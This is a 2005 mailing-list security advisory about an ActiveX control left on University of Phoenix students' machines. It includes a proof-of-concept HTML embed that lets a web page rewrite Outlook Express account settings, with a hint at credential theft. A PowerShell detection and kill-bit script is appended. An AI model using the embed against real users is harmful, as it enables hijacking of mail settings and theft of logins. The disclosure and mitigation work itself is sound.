Message-ID: <d64cfa0d05013121043f370b5d@mail.gmail.com>
Date: Mon, 31 Jan 2005 21:04:26 -0800
From: Adam Baldwin <evilpacket@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: University of Phoenix - Outlook Express
	Unauthorized Configuration Manipulation


 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

University of Phoenix Outlook Express Unauthorized Configuration Manipulation
Vendor Homepage: http://www.phoenix.edu

Discovered by: Adam Baldwin (evilpacket@...nuity-is.com)
www.evilpacket.net\advisories\EP-000-0002.html

Discovery Date: 1.17.2005

File Name: PhxStudent15.ocx
Vulnerable Version: 2.00.0001

Overview:
PhxStudent15.ocx is an ActiveX control used to set up e-mail / NNTP and
LDAP accounts in Outlook Express. This control remains on the user's
system long after the setup process has completed. This ActiveX
control can be used to manipulate the user's account settings (imap /
smtp / nntp / ldap).

The following is an example of how to embed this control into a
website with the proper params. Note the account is only 'modified'
if the "Program" param remains the same, which is not difficult. Any
of the other settings can be modified to cause any number of attacks,
from denial of service to theft of login credentials (be inventive
:-)

Example:
<HTML>
<BODY>
<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4
codeBase="PhxStudent15.ocx">
     <PARAM NAME="Program" VALUE="BSIT">
     <PARAM NAME="GroupID" VALUE="BSAF008HU0">
     <PARAM NAME="CourseID" VALUE="DBM/380">
     <PARAM NAME="StartDate" VALUE="01/20/2005">
     <PARAM NAME="Path" VALUE="">
     <PARAM NAME="DNS" VALUE="bsit2.phoenix.edu">
     <PARAM NAME="Student" VALUE="Y">
     <PARAM NAME="FName" VALUE="FIRSTNAME">
     <PARAM NAME="LName" VALUE="LASTNAME">
     <PARAM NAME="Alias" VALUE="username">
     <PARAM NAME="ErrorPath" VALUE="">
     <PARAM NAME="CourseListPage" VALUE="">
     <PARAM NAME="Account2000YN" VALUE="Y">
     <PARAM NAME="NNTPUserNamePrefix" VALUE="ols\">
     <PARAM NAME="EmailSuffix" VALUE="@email.uophx.edu">
     <PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">
     <PARAM NAME="MailoutLocation" VALUE="emailout.phoenix.edu">
     <PARAM NAME="EmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="FlexnetEmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="LDAPUserName" VALUE="">
     <PARAM NAME="ProgramSuffix" VALUE="_">
</OBJECT>
</BODY>
</HTML>

Mitigation:
The University of Phoenix has been contacted but no response has been
received. I would recommend that students remove this ActiveX control
and only allow it to be installed while registering for classes.

Notes:
At this time further exploitation does not appear possible, although
on the following platform it (with modification of the params) would
crash IE after the ocx was loaded and crashed 3 times in the same
browser window, which begs further research.

Platform: Windows XP SP2, IE 6.0.2900.2180.xpsp2_rtm.040803-2158 

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
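
Added example, not part of the original advisory: a PowerShell check for whether the control with the CLSID from the OBJECT tag above is still registered on a Windows host, plus an optional Internet Explorer kill bit for that CLSID. The kill bit is not mentioned in the advisory; it is the standard IE "Compatibility Flags" mechanism, and the function names here are hypothetical. Run from an elevated prompt.

```powershell
# CLSID taken from the advisory's OBJECT tag.
$Clsid = '{A82C3A33-5C0E-466C-B020-71585433A7E4}'

function Get-ControlRegistration {
    param([string]$Clsid)
    # Machine-wide (native and 32-bit view) and per-user COM registrations.
    $roots = 'HKLM:\SOFTWARE\Classes\CLSID',
             'HKLM:\SOFTWARE\WOW6432Node\Classes\CLSID',
             'HKCU:\Software\Classes\CLSID'
    foreach ($root in $roots) {
        $key = "$root\$Clsid\InprocServer32"
        if (Test-Path -LiteralPath $key) {
            # The default value of InprocServer32 is the path to the .ocx file.
            $file = (Get-Item -LiteralPath $key).GetValue('')
            [pscustomobject]@{
                RegistryKey = $key
                File        = $file
                FileExists  = [bool]($file -and (Test-Path -LiteralPath $file))
            }
        }
    }
}

function Set-KillBit {
    param([string]$Clsid)
    # Flag 0x400 tells Internet Explorer never to instantiate this CLSID.
    $bases = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
             'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    foreach ($base in $bases) {
        if (-not (Test-Path -LiteralPath $base)) { continue }
        $key = "$base\$Clsid"
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        # Preserve any flags already set on the key and add the kill bit.
        $current = [int](Get-ItemProperty -LiteralPath $key).'Compatibility Flags'
        New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value ($current -bor 0x400) -Force | Out-Null
    }
}

$found = @(Get-ControlRegistration -Clsid $Clsid)
if ($found.Count -eq 0) {
    Write-Output "Control $Clsid is not registered on this host."
} else {
    $found | Format-List
    Set-KillBit -Clsid $Clsid
    Write-Output "Kill bit set for $Clsid; unregister and delete the file listed above to remove the control."
}
```

The kill bit also stops the legitimate setup page from loading the control, so delete the `Compatibility Flags` value before re-running the registration process.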